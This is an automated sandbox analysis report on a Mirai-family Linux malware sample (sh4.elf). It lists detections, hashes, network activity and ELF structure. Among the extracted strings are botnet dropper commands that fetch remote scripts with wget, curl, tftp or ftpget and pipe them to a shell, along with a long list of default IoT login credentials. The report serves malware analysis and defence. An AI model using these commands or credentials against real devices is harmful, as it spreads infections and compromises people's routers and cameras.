Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
sh4.elf

Overview

General Information

Sample name:sh4.elf
Analysis ID:1591563
MD5:c50d75a8059ab62c13f60cb4fe6366c0
SHA1:708140f6691add7a5c00fcb2a05b8d604a468db3
SHA256:f8d0a663255551843d3dde55e36c65c2ca3fcc72af1c812e2dc46e6f558374fc
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1591563
Start date and time:2025-01-15 05:02:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:sh4.elf
Detection:MAL
Classification:mal56.troj.linELF@0/0@2/0

Runtime Messages

Command:/tmp/sh4.elf
PID:5439
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

  • system is lnxubuntu20
  • sh4.elf (PID: 5439, Parent: 5362, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.elf
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sh4.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5439.1.00007f42e4400000.00007f42e4415000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: sh4.elfReversingLabs: Detection: 34%
      Source: sh4.elfString: /bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4m68k
      Source: /tmp/sh4.elf (PID: 5439)Socket: 127.0.0.1:43478Jump to behavior
      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
      Source: sh4.elfString found in binary or memory: http:///curl.sh
      Source: sh4.elfString found in binary or memory: http:///wget.sh
      Source: Initial sampleString containing 'busybox' found: usage: busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
      Source: Initial sampleString containing 'busybox' found: /bin/busybox
      Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
      Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
      Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
      Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echo
      Source: Initial sampleString containing 'busybox' found: 191.235.89.0191.234.196.0191.235.53.0134.0.0.035.195.135.035.195.136.035.195.137.035.195.138.035.195.14.035.195.140.035.195.142.035.195.144.035.195.145.035.195.147.035.195.148.035.195.149.035.195.15.035.195.152.035.195.153.035.195.154.035.195.157.035.195.158.035.195.160.035.195.161.035.195.162.035.195.163.035.195.164.035.195.165.035.195.166.035.195.169.035.195.170.035.195.171.035.195.172.035.195.173.035.195.174.035.195.175.035.195.179.035.195.18.035.195.180.035.195.181.035.195.182.035.195.183.035.195.185.035.195.187.035.195.188.035.195.189.035.195.19.035.195.190.035.195.192.035.195.195.035.195.198.035.195.199.035.195.202.035.195.203.035.195.204.035.195.207.035.195.208.035.195.210.035.195.212.035.195.213.035.195.214.035.195.217.035.195.219.035.195.22.035.195.220.035.195.221.035.195.222.035.195.223.035.195.227.035.195.228.035.195.229.035.195.23.035.195.237.035.195.241.035.195.242.035.195.244.035.195.245.035.195.249.035.195.251.035.195.253.035.195.254.035.195.26.035.195.28.035.195.29.035.195.3.035.195.31.035.195
      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnprootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd echo '#!/bin/sh' > check_pids.sh
      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4m68k
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal56.troj.linELF@0/0@2/0
      Source: /tmp/sh4.elf (PID: 5439)Queries kernel information via 'uname': Jump to behavior
      Source: sh4.elf, 5439.1.00007ffdbf5fa000.00007ffdbf61b000.rw-.sdmpBinary or memory string: ~/x86_64/usr/bin/qemu-sh4/tmp/sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.elf
      Source: sh4.elf, 5439.1.00007ffdbf5fa000.00007ffdbf61b000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
      Source: sh4.elf, 5439.1.000055bab6337000.000055bab639a000.rw-.sdmpBinary or memory string: U5!/etc/qemu-binfmt/sh4
      Source: sh4.elf, 5439.1.000055bab6337000.000055bab639a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
      Source: sh4.elf, 5439.1.00007ffdbf5fa000.00007ffdbf61b000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

      Stealing of Sensitive Information

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: sh4.elf, type: SAMPLE
      Source: Yara matchFile source: 5439.1.00007f42e4400000.00007f42e4415000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: sh4.elf, type: SAMPLE
      Source: Yara matchFile source: 5439.1.00007f42e4400000.00007f42e4415000.r-x.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid AccountsWindows Management Instrumentation1
      Scripting      		Path InterceptionDirect Volume AccessOS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Non-Application Layer Protocol      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service

      Malware Configuration

      No configs have been found

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      sh4.elf34%ReversingLabsLinux.Backdoor.Gafgyt

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      daisy.ubuntu.com
      		162.213.35.25
      		truefalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http:///wget.shsh4.elffalse
          		high
          http:///curl.shsh4.elffalse
            		high

            World Map of Contacted IPs

            No contacted IP infos

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            daisy.ubuntu.comarm.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.24
            arm7.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            arm6.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            jefne64.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25
            main_arm6.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            arm5.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            main.arm6.elfGet hashmaliciousMiraiBrowse
            • 162.213.35.25
            rbot.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            Fantazy.arm4.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.24
            Kloki.arm6.elfGet hashmaliciousUnknownBrowse
            • 162.213.35.25

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            No created / dropped files found

            Static File Info

            General

            File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
            Entropy (8bit):6.913640759665752
            TrID:
            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
            File name:sh4.elf
            File size:87'500 bytes
            MD5:c50d75a8059ab62c13f60cb4fe6366c0
            SHA1:708140f6691add7a5c00fcb2a05b8d604a468db3
            SHA256:f8d0a663255551843d3dde55e36c65c2ca3fcc72af1c812e2dc46e6f558374fc
            SHA512:d87d1bb11c7944d7cae92918975a37cc8dc342cd635748d327da937eb1d242d8ec22b8119de9bf6981431edd0947c9e2647d2e74b4f8379b5b5dfdafc9fe8960
            SSDEEP:1536:d/hAyWsHKNUREFoB03UzjeryKmoAn7cjPBSCHyfnkNb:dbHmURY3OQ1mhaPBSLn2b
            TLSH:99837D23D8962E54D544A9B6B0B1CB7E8B13F19086432FEB92D6D3795043DDCFC4A2B8
            File Content Preview:.ELF..............*.......@.4...<T......4. ...(...............@...@..K...K...............P...PB..PB......f..........Q.td............................././"O.n........#.*@........#.*@,....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

            Static ELF Info

            ELF header

            Class:ELF32
            Data:2's complement, little endian
            Version:1 (current)
            Machine:<unknown>
            Version Number:0x1
            Type:EXEC (Executable file)
            OS/ABI:UNIX - System V
            ABI Version:0
            Entry Point Address:0x4001a0
            Flags:0x9
            ELF Header Size:52
            Program Header Offset:52
            Program Header Size:32
            Number of Program Headers:3
            Section Header Offset:87100
            Section Header Size:40
            Number of Section Headers:10
            Header String Table Index:9

            Sections

            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
            NULL0x00x00x00x00x0000
            .initPROGBITS0x4000940x940x300x00x6AX004
            .textPROGBITS0x4000e00xe00x115400x00x6AX0032
            .finiPROGBITS0x4116200x116200x240x00x6AX004
            .rodataPROGBITS0x4116440x116440x35940x00x2A004
            .ctorsPROGBITS0x4250000x150000x80x00x3WA004
            .dtorsPROGBITS0x4250080x150080x80x00x3WA004
            .dataPROGBITS0x4250140x150140x3e80x00x3WA004
            .bssNOBITS0x4253fc0x153fc0x62f40x00x3WA004
            .shstrtabSTRTAB0x00x153fc0x3e0x00x0001

            Program Segments

            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
            LOAD0x00x4000000x4000000x14bd80x14bd86.99850x5R E0x10000.init .text .fini .rodata
            LOAD0x150000x4250000x4250000x3fc0x66f03.15770x6RW 0x10000.ctors .dtors .data .bss
            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

            Network Behavior

            Network Port Distribution

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Jan 15, 2025 05:03:05.423218966 CET4019253192.168.2.138.8.8.8
            Jan 15, 2025 05:03:05.423218966 CET4441953192.168.2.138.8.8.8
            Jan 15, 2025 05:03:05.429641962 CET53444198.8.8.8192.168.2.13
            Jan 15, 2025 05:03:05.430438042 CET53401928.8.8.8192.168.2.13

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jan 15, 2025 05:03:05.423218966 CET192.168.2.138.8.8.80x53f1Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
            Jan 15, 2025 05:03:05.423218966 CET192.168.2.138.8.8.80xb3c8Standard query (0)daisy.ubuntu.com28IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jan 15, 2025 05:03:05.430438042 CET8.8.8.8192.168.2.130x53f1No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
            Jan 15, 2025 05:03:05.430438042 CET8.8.8.8192.168.2.130x53f1No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

            System Behavior

            General

            Start time (UTC):04:03:01
            Start date (UTC):15/01/2025
            Path:/tmp/sh4.elf
            Arguments:/tmp/sh4.elf
            File size:4139976 bytes
            MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

            Chronological Activities